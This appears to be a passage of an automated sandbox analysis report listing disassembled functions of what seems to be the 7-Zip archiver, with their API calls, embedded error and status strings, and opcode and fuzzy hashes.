                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs$fputcfree
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3819637083-0
                                                                                                                                                                                                                                                                            • Opcode ID: cb788c44dfa0eaada90149aae3a18cff9b2e941fef6e7d72ec798f7d4b9bb75c
                                                                                                                                                                                                                                                                            • Instruction ID: ce9b8436537a487697ca89dfef4f269ed2698a6163d800f5b975c6c087786824
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb788c44dfa0eaada90149aae3a18cff9b2e941fef6e7d72ec798f7d4b9bb75c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52F044A230490081DF20EF66E8903596322AB99BF4F044321EEAE137E4DF2CC5458745
                                                                                                                                                                                                                                                                            Function 006A3E08 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 33COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • memmove.MSVCRT ref: 006A3E51
                                                                                                                                                                                                                                                                              • Part of subcall function 006A2B60: CompareFileTime.KERNEL32(?,?,?,00000000,006A3E64), ref: 006A2BA5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareFileTimememmove
                                                                                                                                                                                                                                                                            • String ID: alternate streams$files$streams
                                                                                                                                                                                                                                                                            • API String ID: 1303509325-806849385
                                                                                                                                                                                                                                                                            • Opcode ID: be883e452b7650b9078f8113c3e616bbeedde65b08412c4df6c6f1594ccd81f0
                                                                                                                                                                                                                                                                            • Instruction ID: 3cd0ff5fd04a7252ae22e2ea12f7de13c342226405e2b359399687bd2611c638
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: be883e452b7650b9078f8113c3e616bbeedde65b08412c4df6c6f1594ccd81f0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9F0C89231056962EB60FB25D9057D86312FB46FD4FC05012BA0D47E559F38CBA6CB04
                                                                                                                                                                                                                                                                            Function 00666618 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FormatMessageW.KERNEL32 ref: 00666676
                                                                                                                                                                                                                                                                              • Part of subcall function 0066339C: free.MSVCRT ref: 006633D7
                                                                                                                                                                                                                                                                              • Part of subcall function 0066339C: memmove.MSVCRT(00000000,?,?,00000000,006610A8), ref: 006633F2
                                                                                                                                                                                                                                                                            • LocalFree.KERNEL32 ref: 00666698
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FormatFreeLocalMessagefreememmove
                                                                                                                                                                                                                                                                            • String ID: Error #
                                                                                                                                                                                                                                                                            • API String ID: 2451246624-1299485822
                                                                                                                                                                                                                                                                            • Opcode ID: 99fd73fc856dad1e88b4ccb444db1a8165f30a332f2d2e9cd02aa09722ea5f5f
                                                                                                                                                                                                                                                                            • Instruction ID: 3afc2f2994adfb19394b8c7515b1389993ec4577566f08329710d76d4aa265e4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 99fd73fc856dad1e88b4ccb444db1a8165f30a332f2d2e9cd02aa09722ea5f5f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7721443231428086CB60CF15F44079E77B3F3C5BA4F848226EA8887794DF79C988CB51
                                                                                                                                                                                                                                                                            Function 006649A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: UNC
                                                                                                                                                                                                                                                                            • API String ID: 0-337201128
                                                                                                                                                                                                                                                                            • Opcode ID: caa09ef79893b1e0c723e2139b0e345877b12b567cf7e66d5e2a6cc5cce0967e
                                                                                                                                                                                                                                                                            • Instruction ID: ba73281f8030506dd6e79ea394329149c236c0d15e225684a7307d1d80b4c70d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: caa09ef79893b1e0c723e2139b0e345877b12b567cf7e66d5e2a6cc5cce0967e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7021DF3A344A44D2DF30DF9AD4807A92362E745B84F049027CF4957728EF3ACC89CB46
                                                                                                                                                                                                                                                                            Function 006A05F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A0661
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A0680
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB1C8: memset.MSVCRT ref: 006AB20D
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB1C8: fputs.MSVCRT ref: 006AB232
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs$freememset
                                                                                                                                                                                                                                                                            • String ID: ERROR:
                                                                                                                                                                                                                                                                            • API String ID: 2276422817-977468659
                                                                                                                                                                                                                                                                            • Opcode ID: 9885eecbbf6ca8fc6e066b44c4d0d806fd7fb2900e3a304f7a56ab35e13a5ef5
                                                                                                                                                                                                                                                                            • Instruction ID: b56ffcda1eb45bd42a03acbaac46b1fe14229435a95c989ac5013520d90aec20
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9885eecbbf6ca8fc6e066b44c4d0d806fd7fb2900e3a304f7a56ab35e13a5ef5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F11B652301A4141DB64FF22E86536E6322FB86BD4F044629AE6B57791CF2CC845C348
                                                                                                                                                                                                                                                                            Function 0066B45C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0066B4AA
                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0066B4F8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: QueryValue
                                                                                                                                                                                                                                                                            • String ID: Path64
                                                                                                                                                                                                                                                                            • API String ID: 3660427363-321863482
                                                                                                                                                                                                                                                                            • Opcode ID: ce2d8586953f7850c663cd00a09a8bd9eb970d832503358bfea85760a13bb2cd
                                                                                                                                                                                                                                                                            • Instruction ID: f6a891f56eaf125af57d97149302f18a651af869a605979615bdbe441ea42e6a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce2d8586953f7850c663cd00a09a8bd9eb970d832503358bfea85760a13bb2cd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7217C73614600C7EB10CF25E4A476E73A1F784B84F20902AEB8A47BA8DB3DC885CF40
                                                                                                                                                                                                                                                                            Function 006A427C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Can not open encrypted archive. Wrong password?, xrefs: 006A4297
                                                                                                                                                                                                                                                                            • Can not open the file as archive, xrefs: 006A42D8
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs
                                                                                                                                                                                                                                                                            • String ID: Can not open encrypted archive. Wrong password?$Can not open the file as archive
                                                                                                                                                                                                                                                                            • API String ID: 1795875747-2399861261
                                                                                                                                                                                                                                                                            • Opcode ID: 149c3983409531ef4f283d50ab509c3b453b3246c3b38dfffb22ccf5e133ea28
                                                                                                                                                                                                                                                                            • Instruction ID: da032c8e7336c5726e0f37dbfce399670ca7c6b36d47fee9086ca4f963dfbb83
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 149c3983409531ef4f283d50ab509c3b453b3246c3b38dfffb22ccf5e133ea28
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D701A7A131094592DF94FF66D86135D2313AB86BC4F549036EE0B47340CF79C995C745
                                                                                                                                                                                                                                                                            Function 006693D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: wcscmp
                                                                                                                                                                                                                                                                            • String ID: \??\
                                                                                                                                                                                                                                                                            • API String ID: 3392835482-3047946824
                                                                                                                                                                                                                                                                            • Opcode ID: 877544d1592a68484731fd63782ff1f2adae2ffaa1fbb9196b429caabd26276c
                                                                                                                                                                                                                                                                            • Instruction ID: a3088f66ef8e867b301fdd3090d96e042b0488bfe4822b680348e4dc186e8f78
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 877544d1592a68484731fd63782ff1f2adae2ffaa1fbb9196b429caabd26276c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77F06D6230094492CF04AB6AD9A036D1326FB85B86F905836CF4A97B14CF30C8FBC321
                                                                                                                                                                                                                                                                            Function 006A1FE8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A2011
                                                                                                                                                                                                                                                                              • Part of subcall function 00662300: fputc.MSVCRT ref: 00662311
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputcfputs
                                                                                                                                                                                                                                                                            • String ID: Scan$Scanning
                                                                                                                                                                                                                                                                            • API String ID: 269475090-1436252306
                                                                                                                                                                                                                                                                            • Opcode ID: ffb3ed3a4ca004d2504b304dc7fbd21c8946e14a3d26513a036a6eb6b827f317
                                                                                                                                                                                                                                                                            • Instruction ID: e10b4191a1e2e423c17114275fa17e6e624e6b6e867ea9a705e4f22d8d310c57
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ffb3ed3a4ca004d2504b304dc7fbd21c8946e14a3d26513a036a6eb6b827f317
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3F0B4A234198291DF00FF38C9657A82323E711B88F488125CB0E8B265DF29C8DAC710
                                                                                                                                                                                                                                                                            Function 0066AFA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocExceptionStringThrow
                                                                                                                                                                                                                                                                            • String ID: out of memory
                                                                                                                                                                                                                                                                            • API String ID: 3773818493-2599737071
                                                                                                                                                                                                                                                                            • Opcode ID: ce28fcea7ee96d73b8b783164c7ae5dc4e7789fb7bb4cf3f4b3e7c6f29d84c20
                                                                                                                                                                                                                                                                            • Instruction ID: cc2ad15c19c1d114d9f7b05d2a71a46de2c933f84ba58e7f9b66019d06d4fba0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce28fcea7ee96d73b8b783164c7ae5dc4e7789fb7bb4cf3f4b3e7c6f29d84c20
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65F03072301B8592DB44AB55EA8575C7372FF86784F54C029CB4C17B24EB7AD8B9CB02
                                                                                                                                                                                                                                                                            Function 006AB7C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006AB7E4
                                                                                                                                                                                                                                                                              • Part of subcall function 00662300: fputc.MSVCRT ref: 00662311
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputcfputs
                                                                                                                                                                                                                                                                            • String ID: Scan $Scanning the drive:
                                                                                                                                                                                                                                                                            • API String ID: 269475090-1085461122
                                                                                                                                                                                                                                                                            • Opcode ID: 4a104878c2e5f0d323a3430e672efaa3bd5f76afab79e0bd6a72b63798dffa16
                                                                                                                                                                                                                                                                            • Instruction ID: c5a3632d80a0a79c5b7c46d0b570c661e1c5ebf69368393316bb8624ee366a02
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a104878c2e5f0d323a3430e672efaa3bd5f76afab79e0bd6a72b63798dffa16
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3E086A5301D4281CF41EF29DA9539C2323AB85BE4F946422DE0D57724EF29C9EAC340
                                                                                                                                                                                                                                                                            Function 0068EC5C Relevance: 5.3, APIs: 4, Instructions: 261COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0068ECEE
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0068ECF6
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0068EFE3
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0068EFEB
                                                                                                                                                                                                                                                                              • Part of subcall function 00664D78: free.MSVCRT ref: 00664DBC
                                                                                                                                                                                                                                                                              • Part of subcall function 00664D78: free.MSVCRT ref: 00664DC4
                                                                                                                                                                                                                                                                              • Part of subcall function 00664D78: free.MSVCRT ref: 00664EAC
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2568c4c8a93fed0a7db5756fe4b5abc77c557bdbfdb6e41abb2639136c3796b8
                                                                                                                                                                                                                                                                            • Instruction ID: c1f66df652a2df0e0b6fa9727dcbdd3eda22d2f31b086e2d26d832e85a657a22
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2568c4c8a93fed0a7db5756fe4b5abc77c557bdbfdb6e41abb2639136c3796b8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 45A1E072304B81D6CB20EF26D4943AE7762F798B94F04422ADF9A477A5EF7AC855C700
                                                                                                                                                                                                                                                                            Function 006659E0 Relevance: 5.1, APIs: 4, Instructions: 117COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1534225298-0
                                                                                                                                                                                                                                                                            • Opcode ID: 690fc6323045f1499638e60008430e199e5b92b8d4d6359a2f546a67527e5006
                                                                                                                                                                                                                                                                            • Instruction ID: 5be71ee62b23ee03077b5c3a00516cb0e1433c89f37fb63858b74869669dcda0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 690fc6323045f1499638e60008430e199e5b92b8d4d6359a2f546a67527e5006
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B41C873204E8096CB20EF22E49206EB762F781FE4F544216EB5B67B68DF34C852CB45
                                                                                                                                                                                                                                                                            Function 006925DC Relevance: 5.1, APIs: 4, Instructions: 100COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2d395fef6bf6d2161f205ad2dbd11117f8f32b2c6da05af5b4328dea44ce9941
                                                                                                                                                                                                                                                                            • Instruction ID: 3d9fca5cdeab20b50e1443010a2a38f0e1ed1c5ddad7431356c2acd218b305a7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d395fef6bf6d2161f205ad2dbd11117f8f32b2c6da05af5b4328dea44ce9941
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8141C1B250C6C252CF758B61A060AEEBB7FF386784F054006CBC967F1ACE38C8858B44
